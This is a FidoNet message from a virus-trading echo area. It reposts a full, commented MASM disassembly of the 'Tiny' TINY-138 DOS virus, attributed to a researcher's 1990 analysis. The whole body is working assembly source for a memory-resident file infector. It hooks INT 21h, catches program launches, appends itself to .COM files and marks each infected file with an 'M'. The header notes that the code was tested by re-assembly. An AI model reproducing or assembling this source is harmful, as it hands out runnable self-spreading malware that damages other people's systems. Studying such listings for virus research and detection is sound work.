;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä ; Msg : 16 of 54 ; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12 ; To : - *.* - Fri 11 Nov 94 08:10 ; Subj : TINY_138.ASM ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ;.RealName: Max Ivanov ;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ;* Kicked-up by MeteO (2:5030/136) ;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å) ;* From : Graham Allen, 2:283/718 (06 Nov 94 16:34) ;* To : Fred Lee ;* Subj : TINY_138.ASM ;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ;@RFC-Path: ;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 ;18.n283!not-for-mail ;@RFC-Return-Receipt-To: Graham.Allen@f718.n283.z2.fidonet.org page ,132 name TINY138 title The 'Tiny' virus, version TINY-138 .radix 16 ; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ; ú Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 ú ; ú Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 ú ; ú ú ; ú The 'Tiny' Virus, version TINY-138 ú ; ú Disassembled by Vesselin Bontchev, September 1990 ú ; ú ú ; ú Copyright (c) Vesselin Bontchev 1989, 1990 ú ; ú ú ; ú This listing is only to be made available to virus researchers ú ; ú or software writers on a need-to-know basis. ú ; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ; The disassembly has been tested by re-assembly using MASM 5.0. code segment assume cs:code, ds:code org 100 seg_60 equ 600 v_len equ v_end-first4 start: jmp v_entry ; Jump to virus code db 'M' ; Virus signature mov ax,4C00 ; Program terminate int 21 ; The original first 4 bytes of the infected file: first4 db 0EBh, 2, 90, 90 v_entry: mov si,0FF ; Initialize some registers mov di,offset start ; Put the addres of program start in DI mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler ; The virus will be installed in memory at ; address 0050:0100h (i.e., at segment 60h): mov cx,50 add si,[si+2] ; Determine the start addres of the virus body push di ; Now a Near RET instruction will run the prg. movsw ; Restore the original first 4 bytes movsw mov es,cx ; Point ES:DI at 0050:0100h cmpsb ; Check if the virus is present in memory jz run ; Just run the program if so ; Virus not in memory. Install it there: dec si ; Correct SI & DI to point at the start of dec di ; virus code and to destination address rep movsw ; Move the virus there mov es,cx ; ES := 0 ; Move the INT 21h handler to INT 32h and ; install int_21 as new INT 21h handler. ; By the way, now DI == 1A4h (i.e., 69h*4): xchg ax,bx ; Thransfer INT 21h vector to INT 69h, xchg ax,cx ; preserving AX lp: xchg ax,cx ; Get a word xchg ax,es:[di-(69-21)*4] ; Swap the two words stosw ; Save the word jcxz lp ; Loop until done (two times) xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy) run: push ds ; Restore ES pop es ret ; And exit (go to CS:100h) int_21: ; New INT 21h handler cmp ax,4B00 ; EXEC function call? jne end_21 ; Exit if not push ax ; Save registers used push bx push dx push ds push es mov ax,3D02 ; Open the file for both reading and writting call do_int21 jc end_exec ; Exit on error cbw ; Zero AH cwd ; Zero DX mov bx,si ; Save handle in BX mov ds,ax ; Set DS and ES to 60h, mov es,ax ; the virus data segment mov ah,3F ; Read the first 4 bytes int 69 ; Check whether the file is already infected or is an .EXE file. ; The former contains the character `M' in its 3rd byte and ; the latter contains it either in the 0th or in the 1st byte. mov al,'M' ; Look for `M' repne scasb jz close ; Exit if file not suitable for infection mov al,2 ; Seek to the end of file call lseek ; SI now contains the file size mov cl,v_len ; Length of virus body int 69 ; Append the virus to the file (AH is now 40h) mov al,0E9 ; Near JMP opcode stosb ; Form the first instruction of the file inc si ; Add 1 to file size for the JMP xchg ax,si ; Move it in AX stosw ; Form the JMP's opperand mov al,'M' ; Add a `M' character to mark the file stosb ; as infected xchg ax,dx ; Zero AX call lseek ; Seek to the beginning int 69 ; AH is 40h, write the JMP instruction close: mov ah,3E ; Close the file int 69 end_exec: pop es ; Restore used registers pop ds pop dx pop bx pop ax ; Exit through the original INT 21h handler: end_21: jmp dword ptr cs:[69*4] lseek: mov ah,42 ; Seek operation cwd ; Zero DX do_int21: xor cx,cx ; External entry for Open int 69 mov cl,4 ; 4 bytes will be read/written xchg ax,si ; Store AX in SI mov ax,4060 ; Prepare AH for Write xor di,di ; Zero DI ret ; Done v_end equ $ ; End of virus body code ends end start ;-+- FMail 0.96â ; + Origin: This virus is Microsoft Windows (2:283/718) ;============================================================================= ; ;Yoo-hooo-oo, -! ; ; ; þ The MeÂeO ; ;/A=NNNN Set NewExe segment alignment factor ; ;--- Aidstest Null: /Kill ; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)